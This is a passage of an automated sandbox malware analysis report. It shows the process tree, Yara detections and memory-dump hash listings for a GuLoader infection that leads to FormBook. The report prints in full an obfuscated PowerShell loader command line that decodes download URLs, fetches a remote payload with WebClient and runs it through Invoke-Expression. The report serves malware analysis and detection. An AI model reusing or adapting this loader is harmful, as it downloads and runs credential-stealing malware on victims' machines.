(Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. 
tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;"
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:09:31:16
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:09:31:29
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. 
Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. 
tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;"
                                                                      Imagebase:0x370000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2667645676.000000000A5A8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:09:31:29
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:09:31:58
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3167965625.00000000054F8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:09:32:44
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe"
                                                                      Imagebase:0xc00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:09:32:46
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                      Imagebase:0xa50000
                                                                      File size:17'408 bytes
                                                                      MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:09:33:00
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe"
                                                                      Imagebase:0xc00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:09:33:14
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff79f9e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a99d53b9f9665261dd367788ce0cd396c9ee157a2dd46714cd85e7ec73af91
                                                                        • Instruction ID: 90b9db952fe6cd1f8100b54d008dc35434077f706bf579ed26923bcc2431de11
                                                                        • Opcode Fuzzy Hash: 06a99d53b9f9665261dd367788ce0cd396c9ee157a2dd46714cd85e7ec73af91
                                                                        • Instruction Fuzzy Hash: E8E1A27090DA4D8FEBA8EF28C8567F937E1FF54350F00826AE84DC7691CB7499458B86
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cf45172f6b72ddaaf72e423a34acd35726f4a46be79536c525ba389c9fa55ca
                                                                        • Instruction ID: 6e38f93a1c1f87dffb2eab68665faef2bfebff7908e4653c8f9f6fff65b32842
                                                                        • Opcode Fuzzy Hash: 7cf45172f6b72ddaaf72e423a34acd35726f4a46be79536c525ba389c9fa55ca
                                                                        • Instruction Fuzzy Hash: 63E19130A09A4D8FEBA8EF28D8567F977D1FB54350F00423AE80DC7295DF7899458B86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 66
                                                                        • API String ID: 0-3205838671
                                                                        • Opcode ID: e1edd61da12df6217ed264ad3103587ab8f742b52694dd4ba4fdaca62edde71f
                                                                        • Instruction ID: 3800e0b63a1832360f7d99f5c15fbba47245951ac47ebe3da9f1b81a4ac539e4
                                                                        • Opcode Fuzzy Hash: e1edd61da12df6217ed264ad3103587ab8f742b52694dd4ba4fdaca62edde71f
                                                                        • Instruction Fuzzy Hash: 85B12331E0EF8A4FE799EB2858565B97BE0EF566A0F0841FBD00DC7593DE189C048355
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0bceb7fddc08880cb708982084e2c15abb4e2318c4b7bbbca5ed7fd8b60b9a76
                                                                        • Instruction ID: a42f35dcd0ba4c17489dd0419feaf3170ec9126fb6a0b4b405100b8955a2fbc4
                                                                        • Opcode Fuzzy Hash: 0bceb7fddc08880cb708982084e2c15abb4e2318c4b7bbbca5ed7fd8b60b9a76
                                                                        • Instruction Fuzzy Hash: E5F10432E0EA854FE759EB2858562797BE2EF55A50F1801FEC04DC71D3DF28AC868346
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba8f9bc8c1d5cc03cab1f72477de2ba8214e746d78b640d880ff77f292d46e7e
                                                                        • Instruction ID: 29b120c3a094f5cf6858f1c3d15166a8c75cee0df5e76176c3f95afd0d6a74a4
                                                                        • Opcode Fuzzy Hash: ba8f9bc8c1d5cc03cab1f72477de2ba8214e746d78b640d880ff77f292d46e7e
                                                                        • Instruction Fuzzy Hash: 8CE14532E0EB854FE799EB285852279BBE1EF55A50F1800FEC05CC71D3DE28AC458346
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 603f5d3a32b9cd6106dcb749f4446166e8ca4984b9feb2cf2ed442cca18124bc
                                                                        • Instruction ID: 97e48afa762f7ae12a941650cdeb3aa079e1f5b004e64e2d40740209f4f94b3e
                                                                        • Opcode Fuzzy Hash: 603f5d3a32b9cd6106dcb749f4446166e8ca4984b9feb2cf2ed442cca18124bc
                                                                        • Instruction Fuzzy Hash: A4E12930A18A4D8FDF88EF58D495AAD77E1FFA8350F14416AE40DD7299CB74E881CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 918afb83eb273dac4cef9d024eaeb831a0adde2067582051ee108c8897eb8bfa
                                                                        • Instruction ID: 7cff0a4465a4727e300099e97cace90f9d651069948b6463feac62dc824601b7
                                                                        • Opcode Fuzzy Hash: 918afb83eb273dac4cef9d024eaeb831a0adde2067582051ee108c8897eb8bfa
                                                                        • Instruction Fuzzy Hash: 40B17831A0EBC94FE796AB3858561B57FE1EF12650F0800FBC049CB1D3DA09AC46C356
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34c130523134183ea0be168caf07c51712a07c2006c5d3ea99869ae854e68437
                                                                        • Instruction ID: 711aef8c4ec5832263b556c35da5f248db6ef4ab23b98f37c79aedef7bed5b28
                                                                        • Opcode Fuzzy Hash: 34c130523134183ea0be168caf07c51712a07c2006c5d3ea99869ae854e68437
                                                                        • Instruction Fuzzy Hash: F6C16D30A18A4D8FDF98EF68C485AAD7BF1FF68340F14416AD409D7296CB74E881CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b404a41364737ffdb738179c5167c9abb40d70d5040ea2c01b8e34b61631b783
                                                                        • Instruction ID: 86ea536743826d5648ba3588cd85d0f09421ebca9a202ad3ede987335c4d35de
                                                                        • Opcode Fuzzy Hash: b404a41364737ffdb738179c5167c9abb40d70d5040ea2c01b8e34b61631b783
                                                                        • Instruction Fuzzy Hash: 68A13731E0FA864FE799AA2858571753BD1EF52BA4F4801BED00DC35D3EF18AC128346
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5788daee24148f0a10896322d1986249701e0b8aa4a00e25384ac2004f6d9ffa
                                                                        • Instruction ID: b4c7859afed7ff6a8a5088154b0fa051a82cbbebaff79115811b4f438ded1747
                                                                        • Opcode Fuzzy Hash: 5788daee24148f0a10896322d1986249701e0b8aa4a00e25384ac2004f6d9ffa
                                                                        • Instruction Fuzzy Hash: E4A1827060DA4D8FEBA8EF28D8567F937D1FB58351F00822AE84DC7291CF7499458B86
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c32a74dd82b24507c1ad89fee349ed1984f66e10749c74cec33a7d24d7bacb1
                                                                        • Instruction ID: d1e5fce9ce4d0985ceb4cacb080be1e182a4e4e9a59ffe734c18eae1f7a7dc7c
                                                                        • Opcode Fuzzy Hash: 9c32a74dd82b24507c1ad89fee349ed1984f66e10749c74cec33a7d24d7bacb1
                                                                        • Instruction Fuzzy Hash: 19610421A0EBC94FE756EB2858651A57FE0EF56650F0900FBC088CB4E3DB589C89C366
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 029f0c3df629c764bea2fac5e7a8604f2ca167fb8d87315cd306c7b638872958
                                                                        • Instruction ID: 6691f9fa9349a72b979d397fc053c961ef8b3a3779f08bfe8fe2e169091e458a
                                                                        • Opcode Fuzzy Hash: 029f0c3df629c764bea2fac5e7a8604f2ca167fb8d87315cd306c7b638872958
